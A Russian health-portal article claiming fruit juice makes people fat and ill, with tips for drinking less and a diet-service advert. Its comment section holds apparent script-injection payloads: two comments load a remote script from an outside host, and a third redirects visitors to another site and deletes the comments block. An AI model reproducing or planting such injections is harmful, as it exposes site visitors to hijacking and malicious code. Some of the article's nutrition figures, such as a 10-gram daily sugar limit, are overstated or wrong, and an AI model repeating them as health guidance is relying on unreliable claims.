Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как сок сделает тебя толс...  >>  Как сок сделает тебя толстой и больной
 
Обратная связь
 

Как сок сделает тебя толстой и больной

Размер шрифта
26 февраля 2015 00:00
  • google_analytics: false
  • Нравится

В торговых центрах стоят магазины, выжимающие свежий сок, по телевизору улыбающиеся люди рекомендуют получить больше пользы из сока, звезды шоу-бизнеса одобряют привычку пить сок – все по-настоящему помешались на них. Сок представляют как быстрый и приятный способ получить все полезное, что содержат фрукты. Так почему же мы пытаемся вас настроить против?

Как сок сделает тебя толстой и больной

Сок вместо газировки – шило на мыло

Итак, вы заменили сладкую газировку клюквенным соком и думаете, что уже на пути к здоровью. А на самом деле и обычные, и органические соки содержат много сахара, то есть вы сменили шило на мыло: сладкую газировку на полный стакан сахара! Банка газировки содержит 35-45 грамм сахара, в таком же объеме апельсинового сока 30 грамм сахара, яблочного – 40 грамм, а гранатового – 45 грамм. Недопустимо употреблять так много сахара, каким бы ни был содержащий его продукт. В день достаточно до 10 грамм сахара, так что сок невозможно ввести в рацион без нарушения законов правильного питания.

Фрукты проходят сложную обработку, когда становятся соками. Их пастеризуют, измельчают, фильтруют, пюрируют и выдерживают в огромных емкостях в течение нескольких месяцев, и каждый из этапов лишает фрукты питательных веществ, витаминов и волокон. Затем в оставшийся сок насыпают сахар, который слишком быстро всасывается в кровь, так как сок лишен волокон, регулирующих пищеварение. И сахар крови не только мгновенно повышается и вызывает выброс инсулина, который превращает сахар в жир. Из-за инсулина, сахар мгновенно снижается, поэтому вы чувствуете приступ голода – всего этого не произойдет, если вместо сока вы съедите фрукт. Волокна в нем не дадут сахару быстро всосаться, инсулин не выделиться и не отложит все в виде жира.

Болезни из-за сока

Недавние исследования выяснили, что есть связь между употреблением сока и развитием диабета, тогда как фрукты никак не связаны с ними. Более того, соки могут и навредить сердцу: гарвардские исследователи показали, что ежедневное употребление сладких напитков увеличивает риск сердечно-сосудистых заболеваний у мужчин. Так что желание сохранить сердце, уровень инсулина и стройную талию – это еще одна причина не пить сок.

Сок и страшная улыбка

Вам недостаточно приведенных доводов? Тогда давайте обратимся к зубам. Кислоты сока (не говоря уже о сахаре) могут повредить эмаль зубов, а когда в броне пробита брешь, может появиться и кариес, требующий лечения. Только представьте, как похудеет ваш бумажник, когда придется ставить коронки. И стоит ли таких жертв сок?

Что делать?

Если вы слишком привыкли пить сок, но хотите избавиться от этой привычки, то попробуйте следующие приемы:

  • покупайте овощные соки с минимальным содержанием фруктов и сахара, чем меньше сахара, тем лучше,
  • уменьшите дозу. Положите в стакан немного льда, наполните его на ¾ водой, а потом долейте сок,
  • делайте сок сами. Блендером измельчите фрукты и добавьте воды. Оставляйте мякоть фруктов – она уменьшит влияние сахара,
  • пейте из маленького мерного стаканчика и ограничьтесь одной утренней порцией,
  • перейдите на чай, это несложно и весьма полезно.

Вы готовы заняться своим здоровьем и хотите начать с борьбы с лишними килограммами? Вам поможет наша рубрика «Сбрось лишнее». Если вы хотите реально похудеть – специально для вас создана Диета Елены Малышевой! Уже готовая правильная еда будет доставлена вам в любое место и время. Вам останется только есть и худеть!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:18

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как делается сок? Инфографика   Можно ли пить сок в пакетах?   Как правильно пить сок, чтобы не поправиться?   Секрет пакетированного сока. Инфографика  
01 декабря 2011Яблочный и виноградный соки опасны для здоровья? 09 апреля 2013Знаете ли вы ваш уровень сахара
 
11 марта 2013Свекольный сок снижает давление 11 января 2013Знаете ли вы, какой самый опасный фрукт?
 

Слайдшоу

1
Вся правда о соках
Что выпить для души, фигуры и здоровья?
Может ли обычный сок спасти от всех проблем?

Тесты

1
Есть ли у вас скрытый риск диабета?
Сколько вы проживете?
Оцените риск развития сахарного диабета
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.